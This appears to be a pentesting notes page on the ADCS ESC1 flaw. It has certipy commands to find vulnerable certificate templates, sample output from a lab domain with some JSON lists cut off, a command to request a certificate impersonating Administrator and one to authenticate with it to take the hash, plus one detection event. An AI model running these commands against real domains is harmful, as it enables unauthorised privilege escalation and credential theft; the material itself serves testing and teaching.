👾 Overview

ESC1 is a common ADCS vulnerability where a misconfigured Certificate Template grants enrollment rights to low-privileged users such as Domain Users, and allows requesters to include a subjectAltName in the CSR. This allows a user to request a certificate as any principal such as a DA.

🔍 Discovery

Certipy is the go to tool for findings and exploiting many common ADCS vulnerabilities.

# Enumerate ADCS vulnerabilities with certipy
certipy-ad find -username [username]@[domain] -password [password] -dc-ip [IP]

Running certipy will require a domain user, and it will generate multiple output files including JSONs, these can be manually examined or put into BloodHound.

In the JSON output, certipy will flag a given template as vulnerable:

"1": {
      "Template Name": "CorpVPN",
      "Display Name": "Corp VPN",
      "Certificate Authorities": [
      "Enabled": true,
      "Client Authentication": true,
      "Enrollment Agent": false,
      "Any Purpose": false,
      "Enrollee Supplies Subject": true,
      "Certificate Name Flag": [
      "Enrollment Flag": [
      "Private Key Flag": [
      "Extended Key Usage": [
        "Encrypting File System",
        "Secure Email",
        "Client Authentication",
        "Document Signing",
        "IP security IKE intermediate",
        "IP security use",
        "KDC Authentication"
      "Requires Manager Approval": false,
      "Requires Key Archival": false,
      "Authorized Signatures Required": 0,
      "Validity Period": "20 years",
      "Renewal Period": "6 weeks",
      "Minimum RSA Key Length": 2048,
      "Permissions": {
        "Enrollment Permissions": {
          "Enrollment Rights": [
            "AUTHORITY.HTB\\Domain Computers",
            "AUTHORITY.HTB\\Domain Admins",
            "AUTHORITY.HTB\\Enterprise Admins"
        "Object Control Permissions": {
          "Owner": "AUTHORITY.HTB\\Administrator",
          "Write Owner Principals": [
            "AUTHORITY.HTB\\Domain Admins",
            "AUTHORITY.HTB\\Enterprise Admins",
          "Write Dacl Principals": [
            "AUTHORITY.HTB\\Domain Admins",
            "AUTHORITY.HTB\\Enterprise Admins",
          "Write Property Principals": [
            "AUTHORITY.HTB\\Domain Admins",
            "AUTHORITY.HTB\\Enterprise Admins",
      "[!] Vulnerabilities": {
        "ESC1": "'AUTHORITY.HTB\\\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication"

📌 Exploitation

To exploit this, you’ll need to request a certificate using the vulnerable template, and supply the subject you’d like to impersonate, generally the Administrator account.

# Request certificate
sudo certipy-ad req -username [USERNAME]@[DOMAIN] -password [PASSWORD] -target-ip [IP] -ca '[CA NAME]' -template '[VULNERABLE TEMPLATE NAME]' -upn 'administrator@[DOMAIN]'

This will generate the certificate [USERNAME].pfx which can be used to authenticate as that user.

✨ Post-Exploitation

You can use certipy-ad auth to authenticate as the impersonated user and grab their hash:

# Authenticate and get the user's hash
sudo certipy-ad auth -pfx '[USERNAME].pfx' -username '[USERNAME]' -domain '[domain]' -dc-ip [ip]

🚔 Detection & Evasion

Event 4887: Certificate Services Approved A Certificate Request And Issued A Certificate is emitted when a certificate is issued.

📝 Resources

🔗 Hyperlinkℹ️ Info
SpecterOpsCertified Pre-Owned